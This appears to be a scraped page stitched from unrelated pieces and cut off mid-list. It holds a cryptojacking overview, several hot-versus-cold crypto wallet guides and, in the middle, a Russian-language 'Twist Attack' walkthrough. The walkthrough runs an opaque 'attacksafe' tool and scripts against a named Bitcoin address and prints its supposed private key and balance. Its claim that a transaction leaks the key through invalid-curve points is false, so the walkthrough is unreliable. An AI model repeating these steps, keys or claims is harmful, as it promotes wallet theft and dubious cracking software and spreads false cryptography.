The Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022. In one marked example, Sophos researchers found earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of crypojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots.

Supply chain attacks via npm libraries

The software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software.

A few months after that report, researchers WhiteSource (now Mend) released an additional report that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior.

Romanian attackers target Linux machines with cryptomining malware

Last summer Bitdefender discovered a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A report earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software.

“Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior.

CoinStomp uses sophisticated evasion tactics

CoinStop is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the he /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a report on the attack.

Cryptocurrency farm found in warehouse

Cryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts highlighted an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power,

How to prevent cryptojacking

As it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources.

Employ strong endpoint protection: The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extension to minimize risk of browser-based scripts from executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond.

Patch and harden servers (and everything else). Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities. Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks.

Use software composition analysis. Software composition analysis (SCA) tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts.

Hunt down cloud misconfigurations. One of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications.

How to detect cryptojacking

Cryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking.

Train your help desk to look for signs of cryptomining. Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices.

Deploy a network monitoring solution. Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicates cryptojacking activity, no matter the device it is coming from.

“If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” ],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method.

Use cloud monitoring and container runtime security. Evolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats.

Engage in regular threat hunts. Since so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations.

“Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says.

Monitor your websites for cryptomining code. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves.

How to respond to a cryptojacking attack

After illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned. Some tips for how to respond to a cryptojacking attack include:

Kill web-delivered scripts. For in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it.

Shut down compromised container instances. Immutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured.

Reduce permissions and regenerate API keys. Eradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerating API keys to prevent attackers from walking right back into the same cloud environment.

https://cryptodeeptech.ru/blockchain-attack-vectors/

Majority is not Enough: Bitcoin Mining is Vulnerable

https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf

GitHub

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/PNDBjoT83zA

Source: https://cryptodeep.ru/log4j-vulnerability

Криптоанализ

CRYPTO DEEP TECH

Не так давно пакет elliptic (6.5.4) для стандартных эллиптических кривых был уязвим для различных атак, одним из которых является Twist Attack. Криптографическая проблема была в реализации secp256k1. Нам известно что криптовалюта Биткоин использует secp256k1 и эта атака не обошла Биткоин стороной, согласно уязвимости CVE-2020-28498 подтверждающие стороны транзакции алгоритма ECDSA через определенные точки на эллиптической кривой secp256k1 передавали частичные значение приватного ключа (более простые подгруппы состоящие от 5 до 45 bit )
которые называются секстическими поворотами [sextic twists] этот процесс настолько опасен что раскрывает зашифрованные данные после выполнения ряда операций ECC.

В этой статье мы реализуем Twist Attack на примере и покажем как с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”.

Другими словами эти определенные точки являются злонамеренно выбранными точками на эллиптической кривой secp256k1

https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21

The cofactor is 3^2*13^2*3319*22639

E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

При запуске Twist Attack «приватный ключ» может быть получен при определенном выборе «публичного ключа» (выбранная точка эллиптической кривой secp256k1) , то есть значение в транзакции раскрывается.
После чего раскроется и информация о приватном ключе, но для этого нужно выполнить несколько операций ECC.

E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6

https://attacksafe.ru/twist-attack-on-bitcoin

y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax.

Все точки (x, 0) попадают на недопустимые кривые с b '= -x ^ 3 - ax

Перейдем к экспериментальной части:

(Рассмотрим Биткоин Адрес)

1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq

(Теперь рассмотрим критический уязвимые транзакции)

https://btc1.trezor.io/tx/d76a7daa4c5f67a2b553df96834845e4bf469a9806b3de1d89e107301230e731

Откроем [TerminalGoogleColab].

Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack

git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls

Установим все нужные нам пакеты

requirements.txt

sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt

,

Подготовим RawTX для атаки

1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq

https://btc1.trezor.io/tx/d76a7daa4c5f67a2b553df96834845e4bf469a9806b3de1d89e107301230e731

RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Сохраним в файле: RawTX.txt

RawTX.txt

Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE”

www.attacksafe.ru/software

Права доступа:

chmod +x attacksafe

Применение:

./attacksafe -help

-version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode

./attacksafe -version

Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]

"ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин.

Запустим список всех атак:

./attacksafe -list

Выберем -tool: twist_attack

Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt

0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE”

./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt

Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt

cat SecretPoints.txt

Результат:

Elliptic Curve Secret Points: Q11 = E1([34618671789393965854613640290360235391647615481000045539933705415932995630501, 99667531170720247708472095466452031806107030061686920872303526306525502090483]) Q21 = E2([68702062392910446859944685018576437177285905222869560568664822150761686878291, 78930926874118321017229422673239275133078679240453338682049329315217408793256]) Q22 = E2([36187226669165513276610993963284034580749604088670076857796544959800936658648, 78047996896912977465701149036258546447875229540566494608083363212907320694556]) Q31 = E3([14202326166782503089885498550308551381051624037047010679115490407616052746319, 30141335236272151189582083030021707964727207106390862186771517460219968539461]) Q32 = E3([92652014076758100644785068345546545590717837495536733539625902385181839840915, 110864801034380605661536039273640968489603707115084229873394641092410549997600]) Q33 = E3([13733962489803830542904605575055556603039713775204829607439941608751927073977, 70664870695578622971339822919870548708506276012055865037147804103600164648175]) Q41 = E4([46717592694718488699519343483827728052018707080103013431011626167943885955457, 6469304805650436779501027074909634426373884406581114581098958955015476304831]) Q61 = E6([47561520942485905499349109889401345889145902913672896164353162929760278620178, 23509073020931558264499314846549082835888014703370452565866789873039982616042]) Q62 = E6([54160295444050675202099928029758489687871616334443609215013972520342661686310, 61948858375012652103923933825519305763658240249902247802977736768072021476029]) Q63 = E6([80766121303237997819855855617475110324697780810565482439175845706674419107782, 43455623036669369134087288965186672649514660807369135243341314597351364060230]) Q64 = E6([27687597533944257266141093122549631098147853637408570994849207294960615279263, 8473112666362672787600475720236754473089370067288223871796416412432107486062]) RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Теперь добавим полученные точки secp256k1

Для этого откроем Python-script: discrete.py

Для того чтобы запустить Python-script: discrete.py установим SageMath

Команда установки:

sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

Проверим установку SageMath по команде: sage -v

SageMath version 9.0

Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py

Команда запуска:

sage -python3 discrete.py

Результат:

Discrete_log_rho: 5663673254 229 19231 43549 11713353 47161820 13016 6068 1461826 5248038982 9034433903442 PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503

privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

Мы решили дискретное логарифмирование и с помощью “Китайской теоремы об остатках (Chinese remainder theorem)” получили приватный ключ в десятичном формате.

Конвертируем приватный ключ в HEX формат

Десятичный формат приватного ключа был сохранен в файл: privkey.txt

Запустим Python-script: privkey2hex.py

python3 privkey2hex.py cat privkey2hex.txt

Откроем полученный файл: privkey2hex.txt

Приватный ключ в HEX формате:

PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617

Откроем bitaddress и проверим:

ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6 HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617

https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/

BALANCE: $ 775.77

Исходный код

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/S_ZUcM2cD8I

Источник: https://cryptodeep.ru/twist-attack

Криптоанализ

In the last article: “Blockchain Attack Vectors & Vulnerabilities to Smart Contracts” we reviewed all known attacks on the blockchain, in this article we will talk about crypto threats again and we will talk about identifying vulnerabilities for Cold wallets, as well as for Hot wallets. Blockchain is the underlying tech layer made up of a decentralized ledger, and a very secure data structure as there are a lot of distributed nodes that participate in the consensus algorithm. In order to hack the blockchain, hackers should exploit vulnerabilities in a lot of decentralized nodes.

The basic security assumption of blockchain is that it is impossible to hack so many nodes to change the state of the blockchain.

If blockchain tech is so secure, how could it be hacked?

The Achilles Heal of the technology is the centralized nature of institutional users that manage large amounts of crypto assets (money) for their clients, while the only thing that stays between the money and the hackers is the private key. The private key should be used to sign, on blockchain transactions, the same way that a manual signature could be used to sign traditional checks. If someone steals the institutions’ private key they can create a transaction on their behalf and steal the money. Unlike bank systems – once a hacked transaction is created there is no way to reverse it – the money is literally stolen.

Why is it important to store and safeguard your private key?

Whoever holds the private keys has complete control over the assets associated with that key. Because blockchain transactions are instantaneous and irrevocable, users aim to keep their private key secret. The private key is only generated once, so misplacing a private key effectively renders useless all the crypto assets associated with that address.

Although the optimal custody scenario has yet to be defined, it is undisputed that control of the private key is of paramount concern. In fact, the private key is, in essence, the real asset. It’s intrinsic properties and powers mean there is no way to truly safeguard it without exception.

Cold wallets “The vault of institutional custodians” are hardware devices that store Bitcoin or other cryptocurrencies initially, internet isolated, device. In theory, the cold wallet solution is reported to be the most secure way to store cryptocurrency. Some cryptocurrency users prefer to keep their digital assets in a physical “wallet,” most often a device that looks like a USB stick; they can only be accessed by being plugged directly into a computer and require an internet connection in order for a user to access and move their cryptocurrency funds.

There are several popular cold wallets for commercial use such as Trezor, Ledger Nano S and for enterprise and institutional investors some other devices use a combination of:

1. USB

2. Ethernet

3. SD card

4. External thumb drives

5. Dedicated air gapped machine with HSM

Problems associated with the above hardware is usability and to gain access to the crypto asset you need to connect the cold wallet to a computer and therefore it is exposed to the internet. By doing so you are compromising the cold wallet system through the Internet connection, thus exposing it to potential attack vectors and eventually potential cyber theft.

Using cold wallet storage is a necessary security precaution, especially when dealing with large amounts of Bitcoin and other crypto-assets. For example, a cryptocurrency exchange or crypto fund custodian would typically offer instant withdrawals and might be responsible for hundreds of thousands of Bitcoins and other crypto assets. To minimize the ability that hackers could steal the entire reserve in a security breach, the financial services operator would follow a standard protocol, by keeping the majority of the reserve in cold storage, while holding a smaller percentage of the assets available for day to day trade activity. 

Essentially they would not store the majority of digital assets’ private keys on their server or any other connected computer. The only amount kept on the server is the minimum required to cover anticipated customer withdrawals.

Methods used to secure private keys for digital assets:

1. Data encryption that protects wallets with a strong password

2. Backups for digital wallets in case of computer crashes or fraud

Cold wallets are not truly secure as, at some point, they need to send funds and by doing so they rely on bi-directional communication and are connected to the internet. This is when they can be compromised and be infected with malicious data and extremely vulnerable to attacks. Therefore all cold wallets become hot wallets dispelling the theory of total security for institutional custodians.

Hot wallets today have an important role as they are capable of providing easy access to funds and processing automatic transactions, however private keys of the hot wallets are stored in a method that requires that they are always connected to the internet. There are different type’s of hot wallets that take a different approach on how to store private keys. In mathematical perspective, some duplicate private keys between different participants and other divide a private key between the participant. In other words, hot wallets today tackle the security risk by distributing private keys.

The Hot wallets participants maintain control of their private keys, so the cryptocurrency assets in the hot wallet remain under the holder’s control. However, the assets remain vulnerable to hacking, as a malicious person or group which gains access to your computer or smartphone would theoretically also be able to drain your wallet via getting access to the private key.

Hot wallet’s primary advantage is that it can be used for automatic and fast access transactions. Individuals looking to actually make purchases with their cryptocurrency assets might choose to use a hot wallet, for instance, as the holdings in that wallet can be transferable across the internet and in general, the number of crypto assets is at a high enough value, therefore it is not worth the time and money that hackers would invest to steal. On the other hand, hot wallets are definitely vulnerable to security breaches as they have ongoing access to the internet.

Different types of hot wallets all store the private keys on internet connected applications:

1. Basic Hot wallet – Direct connection of the private key on the Internet

2. Multisig Native Wallet – duplicates private keys – you only need to compromise two participants in order to gain access

3. Multiparty computation (MPC) – Distributes private key between 2-5 participants

If we look at the Multisig method even with 2-3 people or entities having to confirm a particular transaction, hacker groups will spend millions on institutional targets and they only require attack vectors for 2 out of 3 in order to compromise the security. Hacker groups are willing to do this as they stand to gain hundreds of millions in stolen crypto assets.

Using the above solutions could essentially prevent a rogue employee from stealing keys on-site, or from a cold-storage facility, or from any hardware device managed entirely by the company. There are mpc wallet providers that try to limit an attacker or a rogue employee from entering a single network and collecting all of the cryptographic information they would need to authorize and sign an illegal transaction, however, this solution is also not 100% secure and merely mitigating attack vectors is just not an option when billions are at stake.

Why should the industry care?

As of writing this article the total market cap for cryptocurrencies has exceeded $218 billion and is now in the 10th year of existence. In this past 10 years there have been many notable hacks. All institutions with custody of large amounts of crypto assets have a responsibility to their investors to ensure the most robust security options are deployed throughout their enterprise.

Furthermore, the hacks also lead to various other cyber damage

1. Theft of assets – irreversible

2. Reputation damage

3. Theft of private customer data

4. Loss of jobs

5. Closing down the business

But that’s a different article…

Although there is a lot of volatility in the market which in part is driven by FOMO and media hype, it is critical to acknowledge that a major factor is the security of digital assets and this can affect the value of a cryptocurrency or an exchange asset valuation fundamentally altering the entire ecosystem.

Key Takeaways:

• A hot wallet is always connected to the internet; hence it’s prone to online attacks – but it’s more convenient for daily use.

• A cold wallet is mostly not connected to the internet; hence, it’s less prone to online attacks – but it’s less convenient for regular use.

• When choosing a wallet, you should consider the security, convenience, fees, supported coins, and insurance factors.

If you are planning to buy digital assets, deciding how and where to store them is not an option, it’s a necessity. Unlike fiat currencies, cryptocurrencies live on the blockchain and require a proper storage platform known as a wallet. These wallets give you access to your crypto holdings through public and private keys.

You use a public key to send and receive cryptocurrencies and a private key to confirm transactions and prove ownership of a crypto wallet. You can think of your public key as your bank account number and your private key as your pin. The main difference between hot vs. cold wallets is that the former stores private keys online while the latter stores them offline. 

This article takes a deep dive into the hot and cold wallet debate, considerations when choosing a wallet, and using both hot and cold wallets to manage your crypto portfolio. 

What is a Hot Wallet?

A hot wallet is a software wallet that stores public and private keys online. You can access it through your computer or smartphone when connected to the internet. Hot wallets are more convenient for daily use as you don’t have to plug them in and out to use them – you just need an internet connection. They are also typically free to download and use, complete with  a user-friendly interface that makes it easy for anyone to get started.

Hot wallets are vulnerable to attacks because they store public and private keys online, which exposes you to risks like phishing and other scams.

Types of Hot Wallets

There are two types of hot wallets – exchange-based, where a user opens an account with a centralized exchange that acts as the custodian of the users’ funds in their care, and non-custodial software hot wallets.

Exchange-Based Wallets

Exchange-based wallets are part of a centralized exchange. Centralized exchanges are custodial institutions that hold the private keys to their users’ addresses. This means that customers of such custodial financial platforms are not in total custody of their assets, as these are deposited into hot and cold wallets held by the institution.

Unfortunately, this exposes users to the risk of the exchange engaging in certain activities that result in the loss of customers’ funds, as seen in the case of FTX in November 2022. Moving forward, there is an industry wide push for more transparency and to hold custodial institutions accountable for their customers’ tokens with the introduction of Proof of Reserves.

While there is an overall drop in centralized exchange activity, exchange-based wallets are still popular, especially with retail investors, as they make it easy for users to buy and sell cryptocurrency with fiat money. Also, in the event you lose your log-in details, access to your wallet can be restored by contacting the exchange’s customer service.

Non-Custodial Software Hot Wallets

Non-custodial software hot wallets can be accessed through mobile, browser or desktop applications.. Most of the time, they’re available across all three. In the case of these hot wallets, users are responsible for their own private keys and have full control over their funds. While this means your funds are safe in the event of a bank run, as they’re not stored in a custodial institution, if you lose your seed phrase, you will no longer be able to access your wallet and the crypto stored within.

What is a Seed Phrase?

When it comes to storing your seed phrase, don’t just write it on a piece of paper, which will fade over time or possibly be destroyed by water and fire. Instead, use crypto steel to record your seed phrase, and make multiple copies as backup.

Never store your seed phrase on a password manager or anywhere online or on your devices. That includes not taking a photo of it, or putting it in a google doc or note.

Examples of Hot Wallets

MetaMask – Best for Exploring the Ethereum Ecosystem

MetaMask is one of the most popular hot wallets in the crypto space and supports all EVM-compatible tokens. It’s easy to use and is available on desktop and mobile devices. Besides, it has extra in-built features for swapping, sending, and receiving crypto and collecting non-fungible tokens (NFTs) across networks.

Exodus – Best for Desktop

Exodus is the best hot wallet for desktops due to its high transaction speed, ease of use, and diverse client functionalities it provides. It’s one of the most visually appealing and intuitive wallets in the crypto space. It started as a desktop-only wallet but has expanded to support mobile devices. However, the Exodus desktop app for Windows, Linux, and Mac operating systems, is still the wallet’s primary offering.

What is a Cold Wallet?

A cold or hardware wallet is a physical device that stores your private keys offline, costing anywhere between $50 and $250. Cold wallets are the most secure type of crypto wallet, as they are not connected to the internet and are therefore unlikely to be compromised by hackers (unless they have access to your private keys AND the hardware wallet).

Hardware wallets are physical devices that may resemble a USB stick or hard drives, which work by storing your pass codes, PINs and private keys on the device itself. In fact, even if the computer is infected with malware, the cold wallet remains safe as its private keys are held in a chip that never connects to the internet. So even if your computer is hacked or your online wallet is compromised, your coins will still be safe… unless your passcode and device are stolen.

However, as cold wallets are physical objects, that also opens them up to the risk of loss through careless handling. In the unfortunate event that your crypto hardware wallet is lost or stolen, you can use your seed phrase to regenerate your private keys. So remember to keep your seed phrases safe, offline, and on hard copy.

As cold wallets are ideal for long-term crypto storage, they’re better suited for hodling crypto than trading funds.

Ledger

Source: Ledger Nano X

Ledger is one of the most popular crypto hardware wallet providers, offering the Ledger Nano X, Ledger Nano S and the Ledger Nano S plus wallets. These devices are about the size of a thumb drive, running on the Ledger operating system called the Blockchain Open Ledger Operating System. It also has an in-built clear OLED display screen interface, and two navigation buttons for confirming transactions.

Ledger comes complete with a Ledger Live mobile app and a high level of security with its secure element chip used to store cryptographic data. Their flagship model, the Ledger Nano X, offers cryptocurrency compatibility of more than 5,500 tokens.

Trezor

Trezor is another well-known hardware wallet that offers the Trezor One and Trezor Model T. The Trezor Model T offers compatibility with 1,456 coins and tokens, and comes with the desktop, browser and Android Trezor Suite.

Trezor Suite is a user interface which lets you search and buy cryptocurrencies, manage your holdings, and send crypto securely. While this improves the user experience, there is the potential to introduce security vulnerabilities as you are using internet-enabled devices.

Considerations When Choosing a Wallet

Depending on your needs, you may opt for a hot wallet, a cold wallet, or both. We’ve summed up how the three types of wallets covered above compare against each other in this table:

Security

Security is a core feature when choosing a crypto wallet. Blockchain technology is known for its secure and immutable nature; ensuring your wallet has the best security features is necessary. Cold wallets are more secure than hot wallets since they are not always connected to the internet with exposure to potential cybersecurity risks like phishing or other hacks and scams. Besides, ensure your wallet has two-factor authentication (2FA) functionality to prevent unauthorized access to your assets.

Convenience

Since cold wallets store private keys offline, they involve plugging in physical devices and linking to web-based accounts to transfer funds. On the other hand, hot wallets live online; hence they are much easier to use for everyday transactions, like day trading.

Additional Transaction Fees

You’ll be still subjected to gas fees, regardless of whichever wallet you’re using. However, exchange-based wallets may include an additional charge that is derived from gas prices, although this fee may be waived if you are holding or staking the exchange’s native token. Before downloading or purchasing any wallet, check their service charges first.

Supported Coins

The wallet you plan to use may not support the coin you want to invest in. Some wallets support only one coin! Consider Mycelium, for instance. Despite having exceptional functionalities, it only supports Bitcoin. Therefore, be sure to check the wallet’s list of supported coins and tokensbefore using it to avoid disappointments.

Insurance

Some custodians provide asset insurance for users who incur losses through a technical problem or theft. Custodians differ in insurance policies, but selecting one that insures your assets in collaboration with a financial institution is advisable. For example, Binance provides insurance for USD deposits of up to $250,000 for U.S. customers. It has partnered with the Federal Deposit Insurance Corporation (FDIC) to implement this policy.

Using Hot and Cold Wallets to Manage Your Crypto Portfolio

Hot wallets are more convenient for daily use than cold wallets. On the other hand, cold wallets guarantee maximum security than hot wallets. Both wallets support a broad range of cryptocurrencies. Therefore, the ideal wallet for you relies on whether you prioritize the safety of your funds over the convenience of using a wallet regularly.

You can enjoy both benefits by combining both methods. For instance, you can hold a small percentage of funds in a hot wallet for trading purposes and keep the rest of your funds in a cold wallet as a long-term investment.

As a blockchain network participant, o party can rely on so-called “wallets” to manage its accounts and interaction with the blockchain. A party has multiple keys.

Problem

A party’s wallet is vulnerable to malicious attacks leading to key theft. If compromised, an attacker can use the key to issue transactions in that party’s identity. How to prevent the compromisation of keys?

Forces:

• Security – A key may be hacked when being stored in a device, especially when connected to the Internet.

• Usability – Some keys may be frequently used by blockchain participants while other keys may be used infrequently or might act as backup.

Solution

Users can choose to store keys in 2 types of wallets, namely hot wallet and cold wallet. Hot wallet typically refers to the blockchain gateways that are connected to the Internet.

Benefits

• Secure storage – Cold wallets are isolated from the Internet; hence, provide secure storage for keys.

• Usability – Such a secure storage also preserves the usability of keys, as once a cold wallet is connected to the Internet (either directly or via a middleware), a party can utilise those keys.

Drawbacks

• Security – Hot wallets store one’s secret keys online hence are more vulnerable to theft. A cold wallet becomes more vulnerable as soon as it is connected to the hot wallet to copy/migrate a key.

• Usability – Cold wallets are more secure than hot wallets but less convenient to use, as the user has to connect to the cold wallet.

Related patterns

• In master and sub key generation pattern master key can be kept in the cold wallet while sub-keys can be stored in hot wallet.

• Key sharding pattern could be used in a wallet application to split and merge a key to minimise its compromise.

• When being integrated into wallet applications, predefined delegates in delegate list pattern can replace key ownership of a compromised key.

Known uses

• MyEtherWallet is a hot wallet with a graphical interface for instant payment and withdrawal in Ethereum.

• Trezor is a cryptocurrency hardware wallet, designed to store and encrypt users’ coins, passwords, and other digital keys. It is a single-purpose computer with independent memory to save all private data.

• Ledger provides hardware wallet products to stores users’ private keys in a secure hardware device, protecting the cryptocurrencies.

Explore the different crypto storage options

What are the pros and cons of each wallet?

A hot wallet refers to any cryptocurrency wallet connected to the internet. Generally, hot wallets are easier to set up, access, and accept more tokens. But they are also more vulnerable to hacker attacks, possible regulations, and other technical vulnerabilities.

Cold Storage refers to any cryptocurrency wallet that is not connected to the internet. Overall, a cold wallet is more secure, but it doesn’t accept as many cryptocurrencies as hot wallets.

Should I Get a Cold Wallet?

If you are going to own Bitcoin, Ethereum, or other cryptocurrencies worth more than $100, you could buy a cold wallet right now — this is how much it costs.

Maybe you’ve heard people say, “Bitcoin gives you this opportunity of being your own bank”? There are advantages and disadvantages to this responsibility. Generally, cryptocurrencies have fewer middleman fees, less messy banking regulations, etc. Still, it is your responsibility to ensure the safety.

In short, here’s an analogy that can help you: a hot wallet can be thought of as a pocket wallet that you walk around town with; a cold wallet is a bank deposit.

Pros & Cons of Hot Wallets

Using a hot wallet will give you the following benefits:

• By entering your pin and access number into the wallet, you quickly access your coins.

• The investment cost is lower.

• It has an extensive portfolio of applications or software that function as a hot wallet.

• You need to set a PIN code or a security code to use it.

• They allow you to connect to any platform so you can operate and trade.

Using one of these wallets may have the following disadvantages:

